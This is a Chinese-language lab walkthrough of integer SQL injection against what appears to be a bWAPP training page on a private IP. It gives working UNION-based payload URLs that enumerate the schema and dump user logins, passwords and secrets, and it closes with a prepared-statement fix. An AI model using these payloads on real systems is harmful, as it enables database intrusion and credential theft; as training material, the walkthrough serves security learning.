整型注入
基本流程
寻找注入点,判断是否存在注入
1 and 1=1 #
#正常回显
1 and 1=2 #
#错误回显
#则存在注入
http://192.168.80.2/sqli_2.php?movie=100+or+1=1#&action=go
192.168.80.2/sqli_2.php?movie=1+and+1=1#&action=go
192.168.80.2/sqli_2.php?movie=1+and+1=2#&action=go
判断字段数量
1 order by 7 #
--正常回显
1 order by 8 #
--錯誤回显
192.168.80.2/sqli_2.php?movie=1+order+by+7#&action=go
192.168.80.2/sqli_2.php?movie=1+order+by+8#&action=go
判断可注入字段位置
0 union select 1,2,3,4,5,6,7 #
-- union 当前面对为false时执行union后面的语句,故选用0,不存在的字符
http://192.168.80.2/sqli_2.php?movie=0+union+select+1,2,3,4,5,6,7#&action=go
使用内置函数查看数据库信息
database();\version();\user()..
http://192.168.80.2/sqli_2.php?movie=0+union+select+1,database(),version(),user(),5,6,7#&action=go
查看表名
0+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()
使用 group_concat()
函数把获取的表拼接成字符串,方便查看。
使用 where table_schema=database()
指定当前数据库的表,避免获取全部表,导致获取的表数量过多,无法显示完整
http://192.168.80.2/sqli_2.php?movie=0+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()#&action=go
获取表字段名
0+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name="users"+and+table_schema=database()#
http://192.168.80.2/sqli_2.php?movie=0+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name="users"+and+table_schema=database()#&action=go
提权相关信息
http://192.168.80.2/sqli_2.php?movie=0+union+select+1,login,password,secret,email,6,7+from+users#&action=go
--只能显示一行
--可通过 limit 进行逐个提取
--http://192.168.80.2/sqli_2.php?movie=0+union+select+1,login,password,secret,email,6,7+from+users limit 1,1#&action=go
limit 可接收一个或两个整型参数
-
接收一个参数
SELECT * FROM table LIMIT 5; //检索前5个记录行 换句话说,LIMIT n 等价于 LIMIT 0,n。
-
接收两个参数(第一位表示从第几行开始偏移,第二位表示偏移最大数目)
SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
也可通过group_concat进行拼接输出
http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,'-',password,'-') from users limit 0,1),3,4,5,6,7 #
演练
low
http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,'-',password,'-') from users limit 0,1),3,4,5,6,7 #
mid
使用addslashes();
函数进行过滤。受影响字符单引号(’)、双引号(")、反斜线(\)与 NUL(NULL 字符)。
但是整型注入不受影响(不存在 ’ 闭合的问题,故不受影响)
http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,password) from users limit 0,1),3,4,5,6,7 #
high
使用预处理防止sql注入
$id = $_GET["movie"];
$sql = "SELECT title, release_year, genre, main_character, imdb FROM movies WHERE id =?";
// ? 为占位符,等待接收的参数传入
if($stmt = $link->prepare($sql))
// if($stmt = mysqli_prepare($link, $sql))
{
// Binds the parameters for markers
$stmt->bind_param("s", $id);
// mysqli_stmt_bind_param($stmt, "s", $id);
// Executes the query
$stmt->execute();
// mysqli_stmt_execute($stmt);
// Binds the result variables
$stmt->bind_result($title, $release_year, $genre, $main_character, $imdb);
// mysqli_stmt_bind_result($stmt, $title, $release_year, $genre, $main_character, $imdb);
// Stores the result, necessary to count the number of rows
$stmt->store_result();
// mysqli_stmt_store_result($stmt);
// Prints the number of rows
// printf("Number of rows: %d.\n", mysqli_stmt_num_rows($stmt));
}